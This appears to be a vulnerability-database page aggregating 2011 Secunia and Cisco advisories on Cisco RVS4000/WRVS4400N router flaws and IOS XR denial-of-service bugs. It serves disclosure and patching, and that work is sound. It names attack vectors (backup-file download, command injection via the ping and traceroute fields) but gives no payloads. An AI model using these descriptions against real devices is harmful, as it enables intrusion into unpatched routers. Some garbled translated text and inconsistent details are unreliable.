VARIoT IoT vulnerabilities database
| VAR-201105-0190 | CVE-2011-1645 | Cisco RVS4000/WRVS4400N Web Management Interface Information Disclosure Vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
The web management interface on the Cisco RVS4000 Gigabit Security Router with software 1.x before 1.3.3.4 and 2.x before 2.0.2.7, and the WRVS4400N Gigabit Security Router with software before 2.0.2.1, allows remote attackers to read the backup configuration file, and consequently execute arbitrary code, via unspecified vectors, aka Bug ID CSCtn23871. The problem is Bug ID CSCtn23871 It is a problem.A third party may read the backup configuration file and, as a result, execute arbitrary code. The Cisco RVS4000/WRVS4400N is a Gigabit Cisco router. If the administrator of the device previously created a configuration backup using Administration --> Backup & Restore --> Backup, the remote unauthenticated user can access the backup configuration file, which includes all device configuration parameters, including HTTP authentication password and VPN shared key. (PSKs). Cisco RVS4000 and WRVS4400N routers are prone to an information-disclosure vulnerability.
An attacker can exploit this issue to obtain potentially sensitive information. This may aid in further attacks.
This issue is being tracked by Cisco bug ID CSCtn23871. ----------------------------------------------------------------------
Alerts when vulnerabilities pose a threat to your infrastructure
The enhanced reporting module of the Secunia Vulnerability Intelligence Manager (VIM) enables you to combine advisory and ticket information, and generate policy compliance statistics. Using your asset list preferences, customised notifications are issued as soon as a new vulnerability is discovered - a valuable tool for documenting mitigation strategies.
Watch our quick solution overview:
http://www.youtube.com/user/Secunia#p/a/u/0/M1Y9sJqR2SY
----------------------------------------------------------------------
TITLE:
Cisco RVS4000 / WRVS4400N Gigabit Security Routers Multiple
Vulnerabilities
SECUNIA ADVISORY ID:
SA44724
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/44724/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=44724
RELEASE DATE:
2011-05-26
DISCUSS ADVISORY:
http://secunia.com/advisories/44724/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/44724/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=44724
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco RVS4000 and
WRVS4400N Gigabit Security Routers, which can be exploited by
malicious users to compromise a vulnerable system and by malicious
people to disclose sensitive information.
1) The web management interface does not properly restrict access to
the backup configuration file, which can be exploited to download the
file and disclose sensitive information.
2) Input passed via the "ping" or "traceroute" parameters to the web
management interface is not properly sanitised before being used.
This can be exploited to inject and execute arbitrary shell
commands.
3) An unspecified error in the web management interface can be
exploited to retrieve the administrator's private and public keys for
SSL certificates.
Please see the vendor's advisory for the list of affected products.
SOLUTION:
Apply updates when available (Scheduled for June 19, 2011).
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
The vendor credits Michal Sajdak, Securitum.
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20110525-rvs4000.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201105-0191 | CVE-2011-1646 | Cisco RVS4000 Gigabit Security Router Software and WRVS4400N Gigabit Security Router Software vulnerabilities |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
The web management interface on the Cisco RVS4000 Gigabit Security Router with software 1.x before 1.3.3.4 and 2.x before 2.0.2.7, and the WRVS4400N Gigabit Security Router with software before 2.0.2.1, allows remote authenticated users to execute arbitrary commands via the (1) ping test parameter or (2) traceroute test parameter, aka Bug ID CSCtn23871. The Cisco RVS4000/WRVS4400N is a Gigabit Cisco router. The Cisco RVS4000/WRVS4400N has a root command arbitrary command injection vulnerability.
This issue is being tracked by Cisco bug ID CSCtn23871. ----------------------------------------------------------------------
Alerts when vulnerabilities pose a threat to your infrastructure
The enhanced reporting module of the Secunia Vulnerability Intelligence Manager (VIM) enables you to combine advisory and ticket information, and generate policy compliance statistics. Using your asset list preferences, customised notifications are issued as soon as a new vulnerability is discovered - a valuable tool for documenting mitigation strategies.
Watch our quick solution overview:
http://www.youtube.com/user/Secunia#p/a/u/0/M1Y9sJqR2SY
----------------------------------------------------------------------
TITLE:
Cisco RVS4000 / WRVS4400N Gigabit Security Routers Multiple
Vulnerabilities
SECUNIA ADVISORY ID:
SA44724
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/44724/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=44724
RELEASE DATE:
2011-05-26
DISCUSS ADVISORY:
http://secunia.com/advisories/44724/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/44724/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=44724
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco RVS4000 and
WRVS4400N Gigabit Security Routers, which can be exploited by
malicious users to compromise a vulnerable system and by malicious
people to disclose sensitive information.
1) The web management interface does not properly restrict access to
the backup configuration file, which can be exploited to download the
file and disclose sensitive information.
2) Input passed via the "ping" or "traceroute" parameters to the web
management interface is not properly sanitised before being used.
This can be exploited to inject and execute arbitrary shell
commands.
3) An unspecified error in the web management interface can be
exploited to retrieve the administrator's private and public keys for
SSL certificates.
Please see the vendor's advisory for the list of affected products.
SOLUTION:
Apply updates when available (Scheduled for June 19, 2011).
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
The vendor credits Michal Sajdak, Securitum.
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20110525-rvs4000.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201105-0045 | CVE-2011-0949 | Cisco IOS XR SSHv1 '/tmp/ssh_lock' Remote Denial of Service Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco IOS XR 3.6.x, 3.8.x before 3.8.3, and 3.9.x before 3.9.1 does not properly remove sshd_lock files from /tmp/, which allows remote attackers to cause a denial of service (disk consumption) by making many SSHv1 connections, aka Bug ID CSCtd64417. The problem is Bug ID CSCtd64417 It is a problem.A large number of third parties SSHv1 Service disruption via connection ( Disk consumption ) There is a possibility of being put into a state. Available disk space in the '/tmp' filesystem may be consumed.
An attacker can exploit this issue to cause a denial-of-service condition.
This issue is being tracked by Cisco Bug ID CSCtd64417. ----------------------------------------------------------------------
Alerts when vulnerabilities pose a threat to your infrastructure
The enhanced reporting module of the Secunia Vulnerability Intelligence Manager (VIM) enables you to combine advisory and ticket information, and generate policy compliance statistics. Using your asset list preferences, customised notifications are issued as soon as a new vulnerability is discovered - a valuable tool for documenting mitigation strategies.
Watch our quick solution overview:
http://www.youtube.com/user/Secunia#p/a/u/0/M1Y9sJqR2SY
----------------------------------------------------------------------
TITLE:
Cisco IOS XR Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA44725
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/44725/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=44725
RELEASE DATE:
2011-05-26
DISCUSS ADVISORY:
http://secunia.com/advisories/44725/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/44725/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=44725
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco IOS XR, which can be
exploited by malicious people to cause a DoS (Denial of Service).
1) An unspecified error exists when processing IPv4 packets
originating from the Cisco Line Card or Cisco CRS MSC and can be
exploited to crash the NetIO process.
Successful exploitation of this vulnerability requires that an IPv4
address is configured on one of the interfaces of a Cisco Line Card
or Cisco CRS MSC.
3) An unspecified error when processing IPv4 packets can be exploited
to reload the SPA (Shared Port Adapters) Interface Processor.
Successful exploitation of this vulnerability requires that an IPv4
address is configured on any of the SPA interface processor
interfaces.
SOLUTION:
Apply updates. Please see the vendor's advisory for more information.
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor.
2) The vendor credits a customer.
3) Reported by the vendor.
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxr.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxr-ssh.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxrspa.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Cisco Security Advisory: Cisco IOS XR Software SSHv1 Denial of Service Vulnerability
Advisory ID: cisco-sa-20110525-iosxr-ssh
Revision 1.0
For Public Release 2011 May 25 1600 UTC (GMT)
+---------------------------------------------------------------------
Summary
=======
Cisco IOS XR Software contains a vulnerability in the SSH application
that may result in a denial of service condition when the SSH version
1 (SSHv1) protocol is used.
Cisco has released free software updates that address this
vulnerability.
This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxr-ssh.shtml
Affected Products
=================
This vulnerability affects all unfixed versions of Cisco IOS XR
Software devices configured to accept SSHv1 connections. Details on
the affected versions can be found in the Software Versions and Fixes
section of this advisory.
Vulnerable Products
+------------------
To determine the Cisco IOS XR Software release that is running on a
Cisco product, administrators can log in to the device and issue the
show version command to display the system banner. The system banner
confirms that the device is running Cisco IOS XR Software by
displaying text similar to "Cisco IOS XR Software". The software
version is displayed after the text "Cisco IOS XR Software".
The following example identifies a Cisco CRS-1 that is running Cisco
IOS XR Software Release 3.6.2:
RP/0/RP0/CPU0:CRS#show version
Tue Aug 18 14:25:17.407 AEST
Cisco IOS XR Software, Version 3.6.2[00]
Copyright (c) 2008 by Cisco Systems, Inc.
ROM: System Bootstrap, Version 1.49(20080319:195807) [CRS-1 ROMMON],
CRS uptime is 4 weeks, 4 days, 1 minute
System image file is "disk0:hfr-os-mbi-3.6.2/mbihfr-rp.vm"
cisco CRS-8/S (7457) processor with 4194304K bytes of memory.
7457 processor at 1197Mhz, Revision 1.2
17 Packet over SONET/SDH network interface(s)
1 DWDM controller(s)
17 SONET/SDH Port controller(s)
8 TenGigabitEthernet/IEEE 802.3 interface(s)
2 Ethernet/IEEE 802.3 interface(s)
1019k bytes of non-volatile configuration memory.
38079M bytes of hard disk.
981440k bytes of ATA PCMCIA card at disk 0 (Sector size 512 bytes).
Configuration register on node 0/0/CPU0 is 0x102
Boot device on node 0/0/CPU0 is mem:
!--- output truncated
The following example identifies a Cisco 12404 router that is running
Cisco IOS XR Software Release 3.7.1:
RP/0/0/CPU0:GSR#show version
Cisco IOS XR Software, Version 3.7.1[00]
Copyright (c) 2008 by Cisco Systems, Inc.
ROM: System Bootstrap, Version 12.0(20051020:160303) SOFTWARE
Copyright (c) 1994-2005 by cisco Systems, Inc.
GSR uptime is 3 weeks, 6 days, 3 hours, 20 minutes
System image file is "disk0:c12k-os-mbi-3.7.1/mbiprp-rp.vm"
cisco 12404/PRP (7457) processor with 2097152K bytes of memory.
7457 processor at 1266Mhz, Revision 1.2
1 Cisco 12000 Series Performance Route Processor
1 Cisco 12000 Series - Multi-Service Blade Controller
1 1 Port ISE Packet Over SONET OC-48c/STM-16 Controller (1 POS)
1 Cisco 12000 Series SPA Interface Processor-601/501/401
3 Ethernet/IEEE 802.3 interface(s)
1 SONET/SDH Port controller(s)
1 Packet over SONET/SDH network interface(s)
4 PLIM QoS controller(s)
8 FastEthernet/IEEE 802.3 interface(s)
1016k bytes of non-volatile configuration memory.
1000496k bytes of disk0: (Sector size 512 bytes).
65536k bytes of Flash internal SIMM (Sector size 256k).
Configuration register on node 0/0/CPU0 is 0x2102
Boot device on node 0/0/CPU0 is disk0:
!--- output truncated
Additional information about Cisco IOS XR Software release naming
conventions is available in "White Paper: Cisco IOS Reference Guide"
at the following link:
http://www.cisco.com/web/about/security/intelligence/ios-ref.html#9
Additional information about Cisco IOS XR Software time-based release
model is available in "White Paper: Guidelines for Cisco IOS XR
Software" at the following link:
http://www.cisco.com/en/US/prod/collateral/iosswrel/ps8803/ps5845/product_bulletin_c25-478699.html
SSHv1 is configured in Cisco IOS XR Software with the configuration
command ssh server enable. The device is vulnerable if it is running
an affected Cisco IOS XR Software release and has SSHv1 enabled.
The following example shows a device that is running Cisco IOS XR
Software that is configured with SSHv1:
(Router)# show running-config | inc ssh
ssh server vrf default
If the command returns "ssh server v2", then the SSH server is not
configured to accept SSHv1 connections and the device is not
vulnerable.
Details
=======
This vulnerability affects Cisco IOS XR devices that are running
affected software releases and are configured to accept SSHv1
connections. This file begins with the text "sshd_lock" and may not be
properly removed when the session ends. Multiple connections may
consume all available space in the /tmp filesystem and cause the
system to crash, leading to a denial of service condition.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
* SSHv1 may leave /tmp/sshd_lock files
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of this vulnerability may cause the Cisco IOS
XR device to crash, resulting in a denial of service condition.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
This bug was introduced in Cisco IOS XR Software release 3.6.2 and is
fixed with SMU hfr-k9sec-3.6.2.CSCtd74795. The SMU ID for this fix in
3.6.2 is AA03656. This vulnerability has been fixed in 3.8.3, 3.9.1,
and 4.0.0 for customers running later software versions. Software
version 3.7 is not affected by this vulnerability.
Workarounds
===========
SSHv1 can be disabled by configuring the SSH server to only accept
SSHv2 connections. In order to configure a device to only accept
SSHv2 connections, administrators can issue the command ssh server v2
Administrators should manually remove lock files after disabling
SSHv1 or after the server is upgraded to a non-vulnerable version.
The command run rm /tmp/sshd_lock* will delete any sshd_lock files on
the system.
Obtaining Fixed Software
========================
Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html
or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to:
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
Customers encountering device crashes during normal network
operations reported this vulnerability to Cisco.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20110323-iosxr-ssh.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2011-May-25 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:
http://www.cisco.com/go/psirt
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)
iFcDBQFN3SrhQXnnBKKRMNARCMu4AP4sb55wScS5dyO9F1CbzE+tZp+E2r6gakmT
u/BqhPQ9CgD/R4mHpfDC1jTzmyibPUinOZ6Bhw1DLdiqxz0QjXl/iDQ=
=E67d
-----END PGP SIGNATURE-----
| VAR-201105-0194 | CVE-2011-1651 | Cisco IOS XR SPA Interface Processor Remote Denial of Service Vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco IOS XR 3.9.x and 4.0.x before 4.0.3 and 4.1.x before 4.1.1, when an SPA interface processor is installed, allows remote attackers to cause a denial of service (device reload) via a crafted IPv4 packet, aka Bug ID CSCto45095.
An attacker can exploit this issue to cause a denial-of-service condition.
This issue is being tracked by Cisco Bug ID CSCto45095. ----------------------------------------------------------------------
Alerts when vulnerabilities pose a threat to your infrastructure
The enhanced reporting module of the Secunia Vulnerability Intelligence Manager (VIM) enables you to combine advisory and ticket information, and generate policy compliance statistics. Using your asset list preferences, customised notifications are issued as soon as a new vulnerability is discovered - a valuable tool for documenting mitigation strategies.
Watch our quick solution overview:
http://www.youtube.com/user/Secunia#p/a/u/0/M1Y9sJqR2SY
----------------------------------------------------------------------
TITLE:
Cisco IOS XR Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA44725
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/44725/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=44725
RELEASE DATE:
2011-05-26
DISCUSS ADVISORY:
http://secunia.com/advisories/44725/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/44725/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=44725
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco IOS XR, which can be
exploited by malicious people to cause a DoS (Denial of Service).
1) An unspecified error exists when processing IPv4 packets
originating from the Cisco Line Card or Cisco CRS MSC and can be
exploited to crash the NetIO process.
2) An error in the SSH server when handling an SSHv1 connection does
not delete sshd_lock files in the /tmp directory. This can be
exploited to consume all available disk space in the /tmp filesystem
and cause a crash.
Please see the vendor's advisory for the list of affected products
and versions.
SOLUTION:
Apply updates. Please see the vendor's advisory for more information.
PROVIDED AND/OR DISCOVERED BY:
1) Reported by the vendor.
2) The vendor credits a customer.
3) Reported by the vendor.
ORIGINAL ADVISORY:
Cisco:
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxr.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxr-ssh.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20110525-iosxrspa.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
Cisco has released free Software Maintenance Units (SMU) that address
this vulnerability.
Workarounds that mitigate this vulnerability are not available.
Vulnerable Products
+------------------
This vulnerability affects all Engine 5 Line Cards on the Cisco XR
12000 Series Routers. The engine 5 line cards are the SIP-600,
SIP-601, SIP-501, and SIP-401.
To determine the Cisco IOS XR Software release that is running on a
Cisco product, administrators can log in to the device and issue the
show version command-line interface (CLI) command to display the
system banner. The system banner confirms that the device is running
Cisco IOS XR Software by displaying text that is similar to "Cisco
IOS XR Software". The software version is displayed after the text
"Cisco IOS XR Software".
The following example identifies a Cisco XR 12000 Series Router that
is running Cisco IOS XR Software Release 3.9.1:
RP/0/0/CPU0:example#show version
Wed Dec 15 10:16:47.117 singa
Cisco IOS XR Software, Version 3.9.1[00]
Copyright (c) 2010 by Cisco Systems, Inc.
ROM: System Bootstrap, Version 12.0(20090302:133850) [rtauro-sw30346-33S 1.23dev(0.36)] DEVELOPMENT SOFTWARE
Copyright (c) 1994-2009 by cisco Systems, Inc.
example uptime is 26 minutes
System image file is "disk0:c12k-os-mbi-3.9.1/mbiprp-rp.vm"
cisco 12404/PRP (7457) processor with 3145728K bytes of memory.
7457 processor at 1266Mhz, Revision 1.2
1 Cisco 12000 Series Performance Route Processor
1 Cisco 12000 Series SPA Interface Processor-601/501/401
1 Cisco 12000 4 Port Gigabit Ethernet Controller (4 GigabitEthernet)
3 Management Ethernet
5 PLIM_QOS
8 FastEthernet
4 GigabitEthernet/IEEE 802.3 interface(s)
1019k bytes of non-volatile configuration memory.
982304k bytes of disk0: (Sector size 512 bytes).
62420k bytes of disk1: (Sector size 512 bytes).
65536k bytes of Flash internal SIMM (Sector size 256k).
!--- output truncated
To determine if a SPA interface processor is installed in the device,
administrators can log in to the device and issue the show platform
command to display the system line cards.
The following products are not affected by this vulnerability:
* Cisco 12000 Series SPA interface processors running Cisco IOS
Software
* Cisco XR 12000 Series Engine 3 Line Cards
* Cisco ASR 9000 Series Aggregation Services Routers
* Cisco Carrier Routing System Series Routers
No other Cisco products are currently known to be affected by this
vulnerability
Details
=======
Cisco IOS XR Software, which is part of the Cisco IOS Software
family, uses a microkernel-based distributed operating system
infrastructure. Cisco IOS XR Software runs on the Cisco CRS, Cisco
12000 Series Routers, and Cisco ASR 9000 Series Aggregation Services
Routers.
When the SPA interface processor receives specific IPv4 packets
destined for either a network or a network broadcast address of a
configured interface, it will reload and produce an error message
that is similar to what is shown in the example that follows. Transit
traffic through the device does not trigger this vulnerability.
